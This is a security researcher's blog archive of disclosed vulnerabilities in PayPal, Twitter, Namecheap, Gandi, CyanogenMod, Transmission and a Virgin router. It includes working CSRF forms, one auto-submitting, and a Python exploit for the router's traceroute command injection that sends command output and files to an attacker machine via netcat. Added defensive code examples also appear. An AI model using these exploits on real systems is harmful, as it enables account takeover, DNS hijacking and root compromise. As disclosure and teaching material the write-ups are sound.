Henry Hoggard

security research, privacy and vulns

Hijacking PayPal Accounts Using the SMS Feature

by Henry on June 2, 2014

After finding the Cross Site Request Forgery in Twitter that let me Tweet and send direct messages from any account through a bug in the add-a-mobile feature, I decided to check other websites with an SMS feature for the same class of bug. I chose PayPal, as it is usually fairly easy to find a bug there. After intercepting the requests, I found that PayPal did not require a CSRF token to add a mobile device to an account. This matters because PayPal lets you send and receive money, and check the account balance, by SMS: https://www.paypal.com/us/webapps/mpp/mobile/mobile-text

PoC
Direct your target to the first CSRF page; this sends a request that adds your phone number to their account, and PayPal texts the security code needed to verify the number to your phone. Once you have received the code, put it in the confCode field of the second CSRF page and direct the target there; this verifies the phone number and attaches your device to their account.
CSRF 1: Add Phone number to account

<html>

  <body>
    <form action="https://www.paypal.com/webapps/customerprofile/phone/confirm" method="POST">
      <input type="hidden" name="formAction" value="add" />
      <input type="hidden" name="actionId" value="doAction" />
      <input type="hidden" name="phoneType" value="MOBILE" />
      <input type="hidden" name="countryCode" value="GB" />
      <input type="hidden" name="phoneId" value="" />
      <input type="hidden" name="phoneNumber" value="324124142124" />
      <input type="hidden" name="sendCode" value="Send&#32;Code" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CSRF 2: Verify Phone Number

<html>

  <body>
    <form action="https://www.paypal.com/webapps/customerprofile/phone/verify" method="POST">
      <input type="hidden" name="actionId" value="doAction" />
      <input type="hidden" name="phoneNumber" value="" />
      <input type="hidden" name="phoneType" value="" />
      <input type="hidden" name="confCode" value="12323123" />
      <input type="hidden" name="continue" value="Confirm&#32;Phone&#32;Number" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Blacklist Phone Numbers with Drozer on CyanogenMod

by Henry on April 17, 2014

Issue: https://jira.cyanogenmod.org/browse/CYAN-3727

Fixes:

http://review.cyanogenmod.org/#/c/62149

http://review.cyanogenmod.org/#/c/62151/

http://review.cyanogenmod.org/#/c/62150/

Any application on CyanogenMod can read and write the Blacklist content provider without holding any permission. This isn't a high-risk issue, but it could let malware prevent every number from contacting the device.

PoC

dz> run app.provider.insert content://blacklist --integer _id 3 --integer number 9419 --integer normalized_number 9419 --integer is_regex 0 --integer phone 1 --integer message 1
Done.

dz> run app.provider.query content://blacklist/

_id  number   normalized_number  is_regex  phone  message
2    1337     1337               0         1      1
1    2284599  2284599            0         1      1
3    9419     9419               0         1      1

Virgin Superhub 2 Remote Command Execution As Root

by Henry on March 11, 2014

I recently read the write-up on the Virgin Superhub 7-second boot-up flaw (http://ramblingrant.co.uk/2014/03/06/virgin-media-superhub-7-second-security-flaw/); it motivated me to post a remote command execution vulnerability that I found a while back.

The vulnerability is in the traceroute feature of the admin panel. The page runs the traceroute shell command with a user-controlled host, and the host is concatenated into the command line unescaped, so an attacker can terminate the traceroute command with a shell metacharacter and run any command they want. The command runs as root, so no privilege escalation is necessary. In the pseudo code for the traceroute function below, we control the host variable.

Pseudo Code

exec("traceroute " + host + " " + arguments)
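As an added example, not the author's script and not the Superhub's actual code (which is not on this page), here is the pattern in the pseudo code above written out in Python next to a hardened version. vulnerable_traceroute_command builds the same string the pseudo code hands to the shell, so a host of `8.8.8.8; id` becomes two commands. is_valid_host accepts only an IP literal or an RFC 1123 hostname, and safe_traceroute_argv passes the validated host as its own argv element with no shell, after a `--` so that a value beginning with `-` cannot be read as an option; avoiding the shell alone does not stop that kind of option injection. The example never executes traceroute itself; run_traceroute only shows how the argv would be handed to subprocess, and assumes the binary honours the POSIX `--` end-of-options convention.

```python
import ipaddress
import re
import shlex
import subprocess

# Hostname grammar (RFC 1123): dot-separated labels of letters, digits and
# hyphens, no leading or trailing hyphen, 63 chars per label, 253 overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^(?:{_LABEL}\.)*{_LABEL}\.?$")


def vulnerable_traceroute_command(host, arguments=""):
    """The pattern from the pseudo code: exec("traceroute " + host + ...).
    Returns the string the shell would receive so the injection is visible;
    deliberately never executed."""
    return "traceroute " + host + " " + arguments


def is_valid_host(host):
    """Accept an IPv4/IPv6 literal or a syntactically valid hostname, nothing
    else. Shell metacharacters, whitespace and a leading '-' all fail the
    hostname grammar, so they never reach a command line."""
    if not host or len(host) > 253:
        return False
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        pass
    return bool(_HOSTNAME_RE.match(host))


def safe_traceroute_argv(host, max_hops=30):
    """Build argv for subprocess: no shell, validated host, and '--' so the
    host is always treated as an operand rather than an option."""
    if not is_valid_host(host):
        raise ValueError("invalid host: %r" % host)
    hops = int(max_hops)
    if not 1 <= hops <= 255:
        raise ValueError("max_hops out of range")
    return ["traceroute", "-m", str(hops), "--", host]


def run_traceroute(host, timeout=60):
    """Execute with subprocess and no shell (not called by the tests)."""
    proc = subprocess.run(safe_traceroute_argv(host), capture_output=True,
                          text=True, timeout=timeout, check=False)
    return proc.stdout


def quoted_for_shell(host):
    """If a shell really cannot be avoided, shlex.quote turns the host into a
    single word. Validate first anyway: quoting does nothing about a host that
    is itself a valid option string."""
    return "traceroute -- " + shlex.quote(host)


if __name__ == "__main__":
    payload = "8.8.8.8; id"                          # constructed injection payload
    print(vulnerable_traceroute_command(payload))    # two commands for the shell
    print(is_valid_host(payload))                    # False
    print(safe_traceroute_argv("8.8.8.8"))
```

The hostname check is stricter than most web forms need, which is the point: for a fixed-purpose input like a traceroute target, an allow-list of the exact grammar is simpler to reason about than trying to escape every metacharacter the firmware's shell understands.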

To make exploiting this easier I have written a Python script that emulates a terminal: each command is injected into the traceroute request, and its output is sent back to a listener on the attacker's machine using netcat on the device.

Exploit

import re
import socket
import sys

import requests

# Attacker-side settings: the IP and ports of the machine running this script.
# They must be reachable from the Superhub (allow them through your firewall).
ip = '192.168.0.8'
port = 9991        # command output comes back to this port
file_port = 9992   # file contents come back to this port
size = 1024
host = ''
backlog = 5
router = 'http://192.168.0.1'


def getToken():
    # The traceroute page carries a hidden per-page token; it is the name of
    # the fifth hidden input and has to be sent back with the POST.
    regex = '<input type="hidden" name="(.*)" value'
    content = requests.get(router + '/VmRgTraceRoute.html').text
    token = re.findall(regex, content)
    return token[4]


def postRequest(token, cmd):
    # VmTraceRouteHost is concatenated into the shell command unescaped.
    data = {"VmCheckRun": 0, "VmCheckContent": 1, "VmTraceRouteHost": cmd,
            "VmTraceRouteToolCommand": 1, "VmTraceRouteStats": "pwned", token: 0}
    requests.post(router + "/cgi-bin/TraceRouteCgi", data=data)


def processCMD(cmd):
    # Break out of the traceroute command with ';', run cmd, and pipe its
    # output back to our listener with the device's netcat.
    token = getToken()
    cmd = ";export test1=`" + cmd + "`; echo $test1 | nc " + ip + " " + str(port) + " ; echo lol"
    postRequest(token, cmd)


def recvAll(client, timeout=2.0):
    # Read until the device-side nc closes the connection, or until no data
    # has arrived for `timeout` seconds (some netcat builds keep the socket open).
    client.settimeout(timeout)
    chunks = []
    try:
        while True:
            data = client.recv(size)
            if not data:
                break
            chunks.append(data)
    except socket.timeout:
        pass
    return b''.join(chunks)


def getFile(filename):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  # allow reusing file_port
    s.bind((host, file_port))
    s.listen(backlog)
    # nc on the device streams the file to our listener.
    cmd = ";nc " + ip + " " + str(file_port) + " < " + filename + "; echo"
    token = getToken()
    postRequest(token, cmd)
    client, address = s.accept()
    data = recvAll(client)
    if data:
        sys.stdout.write(data.decode('utf-8', 'replace'))
    client.close()
    s.close()


def listenSocket():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(backlog)
    while True:
        cmd = input("> ")
        if cmd.startswith("getfile "):
            filename = cmd.split(" ", 1)[1]
            print(filename)
            getFile(filename)
        else:
            processCMD(cmd)
            client, address = s.accept()
            data = recvAll(client)
            if data:
                print(data.decode('utf-8', 'replace'))
            client.close()


if __name__ == '__main__':
    listenSocket()

Usage
Make sure you are logged into the device's admin panel. Edit the Python script and replace ip and port with your machine's local IP and a port of your choice; the port must be allowed through your firewall, because the script listens on it to read the result of each command.

python routerexploit.py

 ls                  # any command typed at the prompt is executed on the device

 getfile /etc/hosts  # "getfile" downloads a file from the device

Mitigation

Change the admin panel password; an attacker needs to be authenticated to the admin panel to exploit this bug.

Future Work
With this exploit you can pull the custom binaries off the device and look for more bugs and backdoors. You could also use it to attempt to port custom firmware such as DD-WRT to the device.

Gandi.net Domain Forwarding CSRF

by Henry on January 23, 2014

Reported: Jan 20 2014

Fixed: Jan 22 2014

This Cross Site Request Forgery bug lets an attacker add subdomains that forward to a URL of their choice, e.g. malicious.henryhoggard.co.uk.
It occurs because the form carries no CSRF token.
PoC


<html>
  <body>
    <form action="https://www.gandi.net/admin/domain/http_redirection/create/" method="POST">
      <input type="hidden" name="type" value="301" />
      <input type="hidden" name="subdomain" value="test1" />
      <input type="hidden" name="redirect&#95;type" value="http&#58;&#47;&#47;" />
      <input type="hidden" name="redirect" value="test&#46;com" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Transmission 2.80 Torrent Client Denial of Service

by Henry on December 23, 2013

Reported: 17/07/2013
Fix Provided: 20/07/2013
Tested on: Ubuntu & Mac OSX

Providing a magnet link with a large tracker URL string crashes the torrent client Transmission, preventing you from opening it again.

Proof of Concept
udp://open.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com:1337
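The post does not say which part of Transmission fails on the oversized tracker string, so the added example below makes no claim about that; it is not Transmission's code and not the author's. It shows the defensive side instead: a magnet link parser that enforces limits at the boundary, so a `tr=` parameter like the PoC above, padded out to thousands of characters, is rejected with an error rather than handed to the client. The length limits and the allowed tracker schemes are assumed policy for this example, not values taken from Transmission.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Limits are an assumed policy for this example, not Transmission's own values.
MAX_MAGNET_LEN = 4096
MAX_TRACKER_URL_LEN = 512
MAX_TRACKERS = 64
TRACKER_SCHEMES = {"http", "https", "udp"}
_HEX40 = re.compile(r"[0-9A-Fa-f]{40}")    # hex-encoded SHA-1 info hash
_BASE32 = re.compile(r"[A-Za-z2-7]{32}")   # base32-encoded SHA-1 info hash


def parse_magnet(uri):
    """Parse magnet:?xt=urn:btih:<hash>&dn=<name>&tr=<tracker>&... and raise
    ValueError for anything outside the limits, so an oversized or malformed
    tracker URL is rejected at the boundary instead of reaching the client."""
    if len(uri) > MAX_MAGNET_LEN:
        raise ValueError("magnet link too long")
    if not uri.startswith("magnet:?"):
        raise ValueError("not a magnet link")
    info_hash = None
    name = None
    trackers = []
    # parse_qsl splits on '&' and percent-decodes keys and values.
    for key, value in parse_qsl(uri[len("magnet:?"):], keep_blank_values=True):
        if key == "xt":
            if not value.startswith("urn:btih:"):
                raise ValueError("unsupported xt: %r" % value[:80])
            digest = value[len("urn:btih:"):]
            if not (_HEX40.fullmatch(digest) or _BASE32.fullmatch(digest)):
                raise ValueError("malformed info hash")
            info_hash = digest.lower()
        elif key == "dn":
            name = value[:255]          # display name is cosmetic; just cap it
        elif key == "tr":
            if len(value) > MAX_TRACKER_URL_LEN:
                raise ValueError("tracker URL too long (%d chars)" % len(value))
            parts = urlsplit(value)
            if parts.scheme not in TRACKER_SCHEMES or not parts.hostname:
                raise ValueError("bad tracker URL: %r" % value[:80])
            _ = parts.port              # raises ValueError on a non-numeric port
            if len(trackers) >= MAX_TRACKERS:
                raise ValueError("too many trackers")
            trackers.append(value)
        # other keys (xl, ws, kt, x.pe, ...) are ignored here
    if info_hash is None:
        raise ValueError("missing xt")
    return {"info_hash": info_hash, "name": name, "trackers": trackers}


def magnet_is_safe(uri):
    """True if parse_magnet accepts the link, False if it rejects it."""
    try:
        parse_magnet(uri)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    # Constructed input modelled on the PoC tracker URL, padded past the limit.
    poc_tracker = "udp://open." + "A" * 3000 + ".com:1337"
    print(magnet_is_safe("magnet:?xt=urn:btih:" + "a" * 40 + "&tr=" + poc_tracker))
```

Rejecting the link up front also avoids the second half of the reported problem: a link that is never accepted is never persisted, so it cannot take the client down again on every restart.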

Hijacking DNS on NameCheap Domains [Updated]

by Henry on December 23, 2013

Reported: 03/06/2013

Vendor Reported as Fixed: 23/12/2013

Namecheap's DNS setup page was vulnerable to Cross Site Request Forgery, allowing an attacker to set custom DNS servers for a target domain. With the nameservers under their control, the attacker could hijack the DNS records and serve a fake website on the target domain, or redirect the MX records and intercept email.

Proof of Concept

<form action="https://manage.www.namecheap.com/myaccount/modsingle.asp?domain=targetdomain.org&amp;type=dns" method="POST">
  <input type="hidden" name="NSOption" value="custom" />
  <input type="hidden" name="customdnstype" value="customdns" />
  <input type="hidden" name="NS1" value="ns1.evildns.org" />
  <input type="hidden" name="NS2" value="ns2.evildns.org" />
  <input type="hidden" name="NS3" value="" />
  <input type="hidden" name="NS4" value="" />
  <input type="hidden" name="NS5" value="" />
  <input type="hidden" name="NS6" value="" />
  <input type="hidden" name="NS7" value="" />
  <input type="hidden" name="NS8" value="" />
  <input type="hidden" name="NS9" value="" />
  <input type="hidden" name="NS10" value="" />
  <input type="hidden" name="NS11" value="" />
  <input type="hidden" name="NS12" value="" />
  <input type="hidden" name="NSSUBMIT" value="Save Changes" />
  <input type="hidden" name="NS.x" value="NS" />
  <input type="hidden" name="Domain" value="targetdomain.org" />
  <input type="submit" value="Submit request" />
</form>

Aether – Not Completely Anonymous!

by Henry on November 24, 2013


“tl;dr Aether is a distributed network that creates forum–like, anonymous and encrypted public spaces for its constituents. No registration necessary”

I was really interested to hear about Aether, a new piece of distributed, forum-like software. Aether is marketed as an anonymous, distributed and encrypted forum system. This blog post is just a reminder to all that, like a lot of P2P software, it is not completely anonymous.

Is Aether Anonymous?
From the point of view of accounts, yes: no extra information is stored and tied to accounts on Aether. The only identifying information is the handle you choose, which is not tied to a single user; anyone can use that handle.

From the point of view of IP addresses and connection information, however, no. Using tools like netstat, Wireshark and lsof you can see the other nodes connected to the network, so be aware that when you are posting your worldly views, your IP address is easily accessible. It is therefore recommended to connect through a VPN or Tor.

:~ sudo lsof -i -P

aether    23356   TCP 10.113.3.7:49819->82-60-93-222.dsl.in-addr.zen.co.uk:63677 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49820->178-190-233-146.adsl.highway.telekom.at:54590 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49821->host86-120-245-28.range86-129.btcentralplus.com:58426 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49822->chellj080108139058.2.12.vie.surfer.at:56355 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49824->62.80.69.138.dyn.user.ono.com:60594 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49825->cpc4-lee212-2-0-cust492.7-1.cable.virginm.net:64890 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49826->cable-213-30-236-69.zeelandnet.nl:2669 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49827->78.178.191.40.dynamic.ttnet.com.tr:53450 (SYN_SENT)
aether    23356   TCP 10.113.3.7:49828->c-174-61-6-50.hsd1.fl.comcast.net:59805 (ESTABLISHED)
aether    23356   TCP 10.113.3.7:49829->ip-31-205-61-124.ask4internet.com:61056 (SYN_SENT)
aether    23356   TCP 10.113.3.7:49830->0x3ec63d07.inet.dsl.telianet.dk:52074 (SYN_SENT)
aether    23356   TCP 10.113.3.7:49831->cpc8-cwma7-2-5-cust91.7-3.cable.virginm.net:34198 (SYN_SENT)

* certain information such as IP addresses, have been modified or stripped out for privacy reasons

But don't let that stop you; personally I love Aether. It's aesthetically pleasing, easy to use, and a brilliant idea!

Cyber Security Challenge Change Password CSRF

by Henry on November 23, 2013

Cross Site Request Forgery Vulnerability in

https://cybersecuritychallenge.org.uk/

Reported: 10/08/13
Fixed: 12/08/13

The Cyber Security Challenge is a UK-based organisation that runs security challenges for enthusiasts. The bug was a Cross Site Request Forgery vulnerability in the user profile page of the Cyber Security Challenge website. It allowed an attacker to change the password of a target user and log in to their account. The bug was reported on the 10th of July 2013 and was swiftly fixed a couple of days later.

Exploit

<!doctype html>
<html>
<body>
<form name="form0"
action="https://cybersecuritychallenge.org.uk/registration/index.php/player/change_password/change"
method="post">
<input type="hidden" name="user_newpass" value="1234567" />
<input type="hidden" name="user_newpass2" value="1234567" />
<input type="submit" value="Perform CSRF" />
</form>
</body>
</html>

The bug that let me Tweet from Any Twitter Account

by Henry on November 6, 2013

In this post I will explain how I could read direct messages and Tweet from anyone's Twitter account using a Cross Site Request Forgery vulnerability.

Timeline
Discovered: Sunday 3rd November
Reported: Sunday 3rd November
Fixed: Sunday 3rd November

What is Cross Site Request Forgery?
“CSRF is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. With a little help of social engineering (like sending a link via email/chat), an attacker may force the users of a web application to execute actions of the attacker’s choosing. A successful CSRF exploit can compromise end user data and operation in case of normal user. If the targeted end user is the administrator account, this can compromise the entire web application.” Source: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

The Exploit
The vulnerability let me Tweet from anyone's Twitter account and read their direct messages. It was in Twitter's add-a-mobile-device feature, where you add a phone to control your account via SMS (https://twitter.com/settings/devices). To exploit it we create a CSRF page that adds the attacker's mobile number and network to the victim's account. Although the form does carry an authenticity token intended to prevent CSRF, the server did not seem to validate that the token was correct, so any value was accepted.

The exploit code below is the PoC I used to send the request; of course, an attacker could disguise it as a real web page and submit the request in the background.

<form action="https://twitter.com/settings/devices/create" method="POST">
  <input type="hidden" name="device_type" value="phone" />
  <input type="hidden" name="authenticity_token" value="randomthinghere" />
  <input type="hidden" name="device[country_code]" value="+44" />
  <input type="hidden" name="device_country_intl_prefix" value="+44" />
  <input type="hidden" name="device[region_country_code]" value="" />
  <input type="hidden" name="device[address]" value="7123456789" />
  <input type="hidden" name="carrier_name" value="Vodafone" />
  <input type="hidden" name="device[carrier]" value="vodafone_uk" />
  <input type="submit" value="Submit request" />
</form>
<script type="text/javascript">
  // auto-submit so the victim never has to click anything
  document.forms[0].submit();
</script>
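Every CSRF on this page comes down to one of two server-side mistakes: no token at all (the PayPal, Gandi, Namecheap and Cyber Security Challenge forms above) or, as in this Twitter case, a token that is present but never checked. The following added example, which is not Twitter's code and not the author's, shows what the check should look like. It issues a synchronizer token bound to the session with an HMAC, validates it in constant time, and puts a handler that only checks the field is present (the behaviour described above, where `randomthinghere` is accepted) beside one that validates it. The secret, the session ids and the form dictionaries are constructed for the example.

```python
import hashlib
import hmac
import re
import secrets

# Constructed example secret; a real service loads this from configuration.
SERVER_SECRET = b"example-only-secret-not-for-production"
_NONCE_RE = re.compile(r"[0-9a-f]{32}")


def issue_csrf_token(session_id, secret=SERVER_SECRET):
    """Synchronizer token bound to the session: nonce ':' HMAC(secret, nonce:session).
    The nonce makes each token unique; binding to the session means a token the
    attacker obtains from their own account is worthless against the victim's."""
    nonce = secrets.token_hex(16)
    mac = hmac.new(secret, ("%s:%s" % (nonce, session_id)).encode(), hashlib.sha256).hexdigest()
    return "%s:%s" % (nonce, mac)


def validate_csrf_token(session_id, token, secret=SERVER_SECRET):
    """Recompute the MAC for this session and compare in constant time.
    The nonce format is checked first so the MAC input cannot be shaped by the caller."""
    if not token or ":" not in token:
        return False
    nonce, mac = token.split(":", 1)
    if not _NONCE_RE.fullmatch(nonce):
        return False
    expected = hmac.new(secret, ("%s:%s" % (nonce, session_id)).encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)


def broken_add_device(session_id, form):
    """The behaviour described in the post: the authenticity_token field must be
    present, but its value is never checked, so any string is accepted."""
    if not form.get("authenticity_token"):
        return 403, "missing token"
    return 200, "device %s added to session %s" % (form["device[address]"], session_id)


def fixed_add_device(session_id, form):
    """Same handler with the token validated against the caller's own session."""
    if not validate_csrf_token(session_id, form.get("authenticity_token", "")):
        return 403, "invalid token"
    return 200, "device %s added to session %s" % (form["device[address]"], session_id)


if __name__ == "__main__":
    # Constructed forged request mirroring the PoC form above.
    forged = {"authenticity_token": "randomthinghere", "device[address]": "7123456789"}
    print(broken_add_device("victim-session", forged))   # 200: accepted
    print(fixed_add_device("victim-session", forged))    # 403: rejected
    # A token the attacker legitimately obtained for their own session does not transfer.
    forged["authenticity_token"] = issue_csrf_token("attacker-session")
    print(fixed_add_device("victim-session", forged))    # 403: rejected
```

The last case is why the session binding matters: an attacker can always fetch a real token from their own account, so a server that only checks "is this a token we issued" is still forgeable. The SameSite cookie attribute, which browsers added after these reports, is a useful second layer but not a substitute for the server-side check.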

I will demo this vulnerability with my device on the Vodafone network. The network and country are important, as the SMS short code differs between networks. Using some social engineering the attacker gets the target to visit the web page carrying the exploit code. Once we are sure the target has visited it, Twitter is waiting for the device to be activated: text "GO" to the mobile short code, in my case 86444. You then receive a confirmation SMS saying the device has been activated for the account. From here you can simply text the short code to send a Tweet from the user's account.

“GO” -> 86444

“Your phone is activated! Reply w/ help to checkout all the things you can do with Twitter Text messaging…”

This indicates we have successfully compromised the account and can now send Tweets from the target's account.

Next I can send any message to 86444:
"Here is my PoC message"

Severity
Using this I could use all of Twitter's SMS features, including sending Tweets, sending messages and reading direct messages.

Protect Yourself
To protect yourself against these types of attacks in the future, I recommend NoScript.